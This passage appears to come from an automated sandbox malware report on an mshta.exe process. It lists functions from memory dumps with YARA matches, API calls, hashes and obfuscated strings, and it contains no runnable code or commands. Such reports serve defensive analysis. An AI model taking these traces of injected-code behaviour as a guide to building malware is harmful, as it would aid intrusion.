                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 8620c91bcef9eb02d81ed6f966449aed37afb20d4e6fd91d0392f350b800ac87
                • Instruction ID: 1c54ae06b786fbb48f57a2a6180a7bc3aae7cfba0e26853aa2c71eca4124ba4d
                • Opcode Fuzzy Hash: 8620c91bcef9eb02d81ed6f966449aed37afb20d4e6fd91d0392f350b800ac87
                • Instruction Fuzzy Hash: 96900231282441525D85F1584405507400697E0241795D012A1464951C85269956D621
                Function 02ED2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 61644831bd35eab269a7d789ab2610a719815a69099fcf799a7fcc9ef82e4861
                • Instruction ID: 4f30b7410f0f13ed679a94f7db59ecf273301ed40cc623ca3c675d72de2d3703
                • Opcode Fuzzy Hash: 61644831bd35eab269a7d789ab2610a719815a69099fcf799a7fcc9ef82e4861
                • Instruction Fuzzy Hash: 1D90023134140003D980B15854196074005D7E1301F55E011E0464555CD91589569222
                Function 02ED2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 36411b6f1838abb922f53fb6d17ad6a84c4e939c0ec69897ac54ba3e7d098d25
                • Instruction ID: 7d253f75a6fa3b0fafcf89986db2a9c04ff145a19c1665dc880ad5fa1932aee6
                • Opcode Fuzzy Hash: 36411b6f1838abb922f53fb6d17ad6a84c4e939c0ec69897ac54ba3e7d098d25
                • Instruction Fuzzy Hash: 7F90023925340002D9C0B158540960B000587D1202F95E415A0065559CC91589699321
                Function 02ED35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 1d63ea60e8317a159da3df3ee9b4cc5108372d32be6ce3f9753361f0c7cb72cb
                • Instruction ID: 02f852bb1b0aeb263f0dc0a275807c73d83940df2018f0848553563fbc3b2556
                • Opcode Fuzzy Hash: 1d63ea60e8317a159da3df3ee9b4cc5108372d32be6ce3f9753361f0c7cb72cb
                • Instruction Fuzzy Hash: 0990023164550402D940B1584515707100587D0201F65D411A0474569D87958A51A5A2
                Function 02ED39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 0663c6e1d9b642c72048c729496707eb7f0e52bba35b05a951afcdc6aa5599f5
                • Instruction ID: 8cc5a77e72b435aa8c5c79c9d45ae512795528f3d1e28f832cfe595bd1ade561
                • Opcode Fuzzy Hash: 0663c6e1d9b642c72048c729496707eb7f0e52bba35b05a951afcdc6aa5599f5
                • Instruction Fuzzy Hash: A690023128545102D990B15C44056174005A7E0201F55D021A0864595D85558955A221
                Function 005309A4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 72threadwindowCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 348 5309a4-5309a8 349 5309f4-530a1e call 541740 348->349 350 5309aa-5309f3 call 54b060 call 54ba70 call 534140 call 521410 348->350 355 530a40-530a45 349->355 356 530a20-530a31 PostThreadMessageW 349->356 350->349 356->355 358 530a33-530a3d 356->358 358->355
                APIs
                • PostThreadMessageW.USER32(14_8-J-J8,00000111,00000000,00000000), ref: 00530A2D
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID: 14_8-J-J8$14_8-J-J8$8
                • API String ID: 1836367815-3311450054
                • Opcode ID: fc13ff0a71d076bfed5e476ffa27501aeaae3d0b5ba4c3a1d98c4645d0fd7757
                • Instruction ID: bf9ea9cb845dce4c2b9b83a19270b4b1c5bca273a95bfe9a371568c33f518598
                • Opcode Fuzzy Hash: fc13ff0a71d076bfed5e476ffa27501aeaae3d0b5ba4c3a1d98c4645d0fd7757
                • Instruction Fuzzy Hash: B311E671D40359BAEB219AA08C46FDF7F78AF81744F144058F9047F182D674AA069BA5
                Function 00530975 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71threadwindowCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 483 530975-530977 484 5309b7-530a1e call 54b060 call 54ba70 call 534140 call 521410 call 541740 483->484 485 530979 483->485 499 530a40-530a45 484->499 500 530a20-530a31 PostThreadMessageW 484->500 486 53097b-530999 485->486 487 53099a-5309a1 485->487 486->487 500->499 501 530a33-530a3d 500->501 501->499
                APIs
                • PostThreadMessageW.USER32(14_8-J-J8,00000111,00000000,00000000), ref: 00530A2D
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID: 14_8-J-J8$14_8-J-J8
                • API String ID: 1836367815-2300785184
                • Opcode ID: 823298dc12a135ce9327697aae650c61c672005b061da40508a0a1569691f0a1
                • Instruction ID: 6d54d1cea6312eabe19d95cff46851f399b5d957b972906a32b9fd58daf78276
                • Opcode Fuzzy Hash: 823298dc12a135ce9327697aae650c61c672005b061da40508a0a1569691f0a1
                • Instruction Fuzzy Hash: 07117F31D40348B6EB10DAA59C45FDFBF7CAF85710F004055FA08BB282D774A6058B95
                Function 005309B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 502 5309b0-530a1e call 54b060 call 54ba70 call 534140 call 521410 call 541740 515 530a40-530a45 502->515 516 530a20-530a31 PostThreadMessageW 502->516 516->515 517 530a33-530a3d 516->517 517->515
                APIs
                • PostThreadMessageW.USER32(14_8-J-J8,00000111,00000000,00000000), ref: 00530A2D
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID: 14_8-J-J8$14_8-J-J8
                • API String ID: 1836367815-2300785184
                • Opcode ID: 6226ec75c0c6a454b765ae99fe59d60a10c462eb1897dc4a18fd4a6b332a5b5d
                • Instruction ID: 81bdff5036c64b674854be39301271ed45bcb8068cf824c50bbbe364c8e1d793
                • Opcode Fuzzy Hash: 6226ec75c0c6a454b765ae99fe59d60a10c462eb1897dc4a18fd4a6b332a5b5d
                • Instruction Fuzzy Hash: AD012631D4031876EB21A6A18C06FDF7F7CAF80B40F008054FA047B2C1D6B4AA069BE5
                Function 005435F0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                Download Yara Rule
                APIs
                • Sleep.KERNELBASE(000007D0), ref: 005436CB
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: Sleep
                • String ID: net.dll$wininet.dll
                • API String ID: 3472027048-1269752229
                • Opcode ID: 8907e4f39e166c411ee01f930a4b83284eb160a036cd07420165da6f02819127
                • Instruction ID: db9a4f0390e9a77a35f676d44f686df400519c15e135022e0e75cdc890051156
                • Opcode Fuzzy Hash: 8907e4f39e166c411ee01f930a4b83284eb160a036cd07420165da6f02819127
                • Instruction Fuzzy Hash: AA318CB1A00705BBD714DFA4C885FEBBBB8FB84714F10451DB559AB281D774AB40CBA4
                Function 0053F0A9 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 103COMMON
                Download Yara Rule
                APIs
                • CoInitialize.OLE32(00000000), ref: 0053F0C7
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: Initialize
                • String ID: @J7<
                • API String ID: 2538663250-2016760708
                • Opcode ID: 6f35583276a351e733d985038f74af85754a76c14e485a0c87da6e42a0aabcca
                • Instruction ID: bf1f3823f7a17a45ee1f3a6d4fd7d67898451337dad8932e6117328a4b4b7ca1
                • Opcode Fuzzy Hash: 6f35583276a351e733d985038f74af85754a76c14e485a0c87da6e42a0aabcca
                • Instruction Fuzzy Hash: 4531FDB6A1060AAFDB00DFD8D8809EFB7B9BF88304F108559E515AB214D775EE45CBA0
                Function 0053F0B0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                Download Yara Rule
                APIs
                • CoInitialize.OLE32(00000000), ref: 0053F0C7
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: Initialize
                • String ID: @J7<
                • API String ID: 2538663250-2016760708
                • Opcode ID: b5e8863e55f8d821b0291e69df75c0f2d78ea6fbc229a9a11b9c27def748576b
                • Instruction ID: 1482df195188e107a39e9d50045719655b7a85f01bf647a661165643e0fd8c36
                • Opcode Fuzzy Hash: b5e8863e55f8d821b0291e69df75c0f2d78ea6fbc229a9a11b9c27def748576b
                • Instruction Fuzzy Hash: 92310CB5A0060AAFDB00DFD8DC809EFB7B9BF88304F108559E915AB214D775EE45CBA0
                Function 00537FE0 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                Download Yara Rule
                APIs
                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00537FBC
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 06b6a90070744e342cdab425dc7603143a4a8b7d938ed9668fcbf1c7052f662e
                • Instruction ID: 511fa0b600f316333c6e4462ef58695a013cea04d3ac4375c94042fe41d4f151
                • Opcode Fuzzy Hash: 06b6a90070744e342cdab425dc7603143a4a8b7d938ed9668fcbf1c7052f662e
                • Instruction Fuzzy Hash: 5521EE63519353ABC7154938D88B2D1BFC4FB06638B745798D0214F5C1DB22D88BD7D1
                Function 00534140 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 005341B2
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0
                • Opcode ID: db8ee8fa6869118bf05ef2a336e82e6538ab0c4bc372bbb6e22ac2f78f82d93c
                • Instruction ID: 4501098599e76a9dcffd1ffb6505613cc5bad94c9e8fda94f6ef084b374f0f54
                • Opcode Fuzzy Hash: db8ee8fa6869118bf05ef2a336e82e6538ab0c4bc372bbb6e22ac2f78f82d93c
                • Instruction Fuzzy Hash: 4C0112B6E4020EA7DF10DAE4DC46FDDBB78AB94708F004195E90897241F671EB54CB91
                Function 005492F0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                Download Yara Rule
                APIs
                • CreateProcessInternalW.KERNELBASE(?,?,?,?,00537F4E,00000010,?,?,?,00000044,?,00000010,00537F4E,?,?,?), ref: 00549353
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: CreateInternalProcess
                • String ID:
                • API String ID: 2186235152-0
                • Opcode ID: 38dcccab76c19756cfad6db72e33ff0aa66d3d5edec3420a69c5b5e22c34f49f
                • Instruction ID: 7b0aa7a5d6e393c218ae23581290a88f7f71c3ed5d0fad19373720b36df28150
                • Opcode Fuzzy Hash: 38dcccab76c19756cfad6db72e33ff0aa66d3d5edec3420a69c5b5e22c34f49f
                • Instruction Fuzzy Hash: EC01D2B2204109BBDB44DF89DC81EEB77ADAF8C714F418208BA09E7241D631FC51CBA4
                Function 00529BA0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                Download Yara Rule
                APIs
                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00529BE5
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: CreateThread
                • String ID:
                • API String ID: 2422867632-0
                • Opcode ID: e32e52a3b991dfb785de9cc77c824cc80be7fe5a3d425403359f45cbf05bd7e6
                • Instruction ID: 87c027a508710c0d70cf6bb8cd4abb1311282a9d78b3b11aa23c53e71fae964b
                • Opcode Fuzzy Hash: e32e52a3b991dfb785de9cc77c824cc80be7fe5a3d425403359f45cbf05bd7e6
                • Instruction Fuzzy Hash: F0F065333846143AE62071A9AC06FD77A8CDFC1761F140025F64CEB2C1D896B54156E9
                Function 00529B9C Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                Download Yara Rule
                APIs
                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00529BE5
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: CreateThread
                • String ID:
                • API String ID: 2422867632-0
                • Opcode ID: 06eb7cbb993b03b6c2ae8bd19b188f05332a59b644e87a95483075884f042889
                • Instruction ID: 6c5675965f029023f3d127038e12a4424745a69b5871875a3c5ff3afc875d7da
                • Opcode Fuzzy Hash: 06eb7cbb993b03b6c2ae8bd19b188f05332a59b644e87a95483075884f042889
                • Instruction Fuzzy Hash: 91F02B32280A103AE63022A89C47FDB7A5CDFC1750F100014F64DAB2C1C9A2B80286E4
                Function 00547E30 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                Download Yara Rule
                APIs
                • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 00547E73
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: Path$NameName_
                • String ID:
                • API String ID: 3514427675-0
                • Opcode ID: 306ccb214922e5c0e23f2a3a073c80bb8823ec9cc9e66877662352cea8a0ca09
                • Instruction ID: f1c52bee06b1f635324c4c3639c5597d570ed03a42a72f64f94d561b38dceb75
                • Opcode Fuzzy Hash: 306ccb214922e5c0e23f2a3a073c80bb8823ec9cc9e66877662352cea8a0ca09
                • Instruction Fuzzy Hash: 64F039B56506097BDA10EE59DC41EEB77ACEFC9754F008419FA08A7241C670B9118BF4
                Function 00549260 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                Download Yara Rule
                APIs
                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFEBCBD,00000007,00000000,00000004,00000000,005339BE,000000F4), ref: 0054929F
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 0e893eb5d20eb2c49f3964149c8d38e4493d492713042be715878a4d1694b429
                • Instruction ID: 423de08663c729e5e3f4d480d330e3e99be81fd60ed588e673da4880fe488d73
                • Opcode Fuzzy Hash: 0e893eb5d20eb2c49f3964149c8d38e4493d492713042be715878a4d1694b429
                • Instruction Fuzzy Hash: DCE06D716002497BEA10EE58DC45EDB37ACEFC9720F404418F908A7242CA70B81187B8
                Function 00549210 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00531649,?,0054570B,00531649,005451DF,0054570B,?,00531649,005451DF,00001000,?,?,00000000), ref: 0054924F
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: c8a19b05e8f33450ad0a94f44c71f626650ed0b1ae2f9d5f6ae6dc2fc0e2b896
                • Instruction ID: f594eb39764b887477799e558dd36ce4eaf033f0aee958c5521201c2ed98f2bd
                • Opcode Fuzzy Hash: c8a19b05e8f33450ad0a94f44c71f626650ed0b1ae2f9d5f6ae6dc2fc0e2b896
                • Instruction Fuzzy Hash: BBE06D716402057BD610EE58DC49F9B77ACEFC9710F008019F908A7242C630B9148BB8
                Function 00537F90 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                Download Yara Rule
                APIs
                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00537FBC
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: e3d59eb00638ab8072c7776ecc22df313c9a814dc3f1845db0b85d205fab0b49
                • Instruction ID: 1410bfe042a0babf840458868a85eece30f5bc1a42efc405bc58d25ae82dac44
                • Opcode Fuzzy Hash: e3d59eb00638ab8072c7776ecc22df313c9a814dc3f1845db0b85d205fab0b49
                • Instruction Fuzzy Hash: 51E080716543092BFB346578DC45F65375CA74C728F144570B95CDB5C1D578F9414150
                Function 00537F89 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                Download Yara Rule
                APIs
                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00537FBC
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 61f79a53555538bc42af5be30e6f9d6f665386fe0cff89438d61bf0f7cd28812
                • Instruction ID: 6010999ef5f74ca0bff329acbaa312ba8b3ece9bd183d367b6cc591f88d92bc4
                • Opcode Fuzzy Hash: 61f79a53555538bc42af5be30e6f9d6f665386fe0cff89438d61bf0f7cd28812
                • Instruction Fuzzy Hash: EDE02BF195420D36FB3025344C46BB11B04B79DB28F280B20B8289E5C1F138ED024110
                Function 00537D80 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                Download Yara Rule
                APIs
                • SetErrorMode.KERNELBASE(00008003,?,?,00531930,00547B1F,005451DF,00531900), ref: 00537DB3
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: ErrorMode
                • String ID:
                • API String ID: 2340568224-0
                • Opcode ID: 77c9b0867f73a3f1d48334fb6d5e1bcca487c79abd60476a3e421f40e1f9c931
                • Instruction ID: 657d6ad6ebbba8965d98fd0fd8fa35c6680d94825cde8004858ff64c91114cd0
                • Opcode Fuzzy Hash: 77c9b0867f73a3f1d48334fb6d5e1bcca487c79abd60476a3e421f40e1f9c931
                • Instruction Fuzzy Hash: 2BD02E72B803043FFA50B2F0CC07F92368CAB50351F004020BA8CEB2C2E828F20045BA
                Function 00537DBA Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                Download Yara Rule
                APIs
                • SetErrorMode.KERNELBASE(00008003,?,?,00531930,00547B1F,005451DF,00531900), ref: 00537DB3
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: ErrorMode
                • String ID:
                • API String ID: 2340568224-0
                • Opcode ID: c4960a3660b3bc3397b4005a4d779cc0765185ab9e4881f8507527ff97859c28
                • Instruction ID: f5f7cb751238d2fa3e2d203861a6e47dc65584099ad63b0ab68893a0e503d96e
                • Opcode Fuzzy Hash: c4960a3660b3bc3397b4005a4d779cc0765185ab9e4881f8507527ff97859c28
                • Instruction Fuzzy Hash: 31D022D298820611FB81A1B02C0B6A55A482F60216F08C968F40CC4083FA08C0811022
                Function 02ED2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 110fa4d912eebc4974d5a32e84d8df203c7a124c258c84392a5a043190dc9033
                • Instruction ID: dd2299ddc4456550d0e532b0349a3d6c27dde8ecb009721312ae40368147131a
                • Opcode Fuzzy Hash: 110fa4d912eebc4974d5a32e84d8df203c7a124c258c84392a5a043190dc9033
                • Instruction Fuzzy Hash: 74B092729829C5CAEE52E7604A09B1B7A00ABD0705F2AD462E3070686F4738C5D2F2B6

                Non-executed Functions

                Function 031B3C8F Relevance: 21.3, Strings: 17, Instructions: 63COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4607115675.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_31b0000_mshta.jbxd
                Similarity
                • API ID:
                • String ID: `{r$ ;}g$!:ir$7}ff$: =?$;97r$;<&=$>>3}$adrz$ae|a$bcb$cggr$fba|$gae|$g|br$rrc$|b|`
                • API String ID: 0-643199265
                • Opcode ID: 9f47ad60c118ccf9ed60935be4e2fa58c1ce499a9b182863c4bbea5d011b6650
                • Instruction ID: abae17ac2e2c20b808f1a1af3e6c1a6c4818d919181ad98b5f6c7f486c12c20c
                • Opcode Fuzzy Hash: 9f47ad60c118ccf9ed60935be4e2fa58c1ce499a9b182863c4bbea5d011b6650
                • Instruction Fuzzy Hash: F03152B480470CDBCB10DF85D280AEDBB70FF08358F90915EE8056B289D732865ACB89
                Function 02ED2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                • API String ID: 48624451-2108815105
                • Opcode ID: 726e175f95a36e91bf7ac46b827c32ef8abe841166443e623b0fb34a02f04d7c
                • Instruction ID: cf36e5fc050b4f0e36e3185a7e81f38dcd8ca838bcfc640287a62c918b7ab90e
                • Opcode Fuzzy Hash: 726e175f95a36e91bf7ac46b827c32ef8abe841166443e623b0fb34a02f04d7c
                • Instruction Fuzzy Hash: 58510BB6A842167FDF20DB98C8C057EF7B8BB08244750D169EA95D7641D374DE01CBA0
                Function 02F42410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                • API String ID: 48624451-2108815105
                • Opcode ID: 5e01659404bdaa9e71648905ec7d3147edce16c8dfd30f07d4a0414ee70801d7
                • Instruction ID: b8d55e9127404abe560161b8d963d2740e38d086726a9b4ca2b78d251e943618
                • Opcode Fuzzy Hash: 5e01659404bdaa9e71648905ec7d3147edce16c8dfd30f07d4a0414ee70801d7
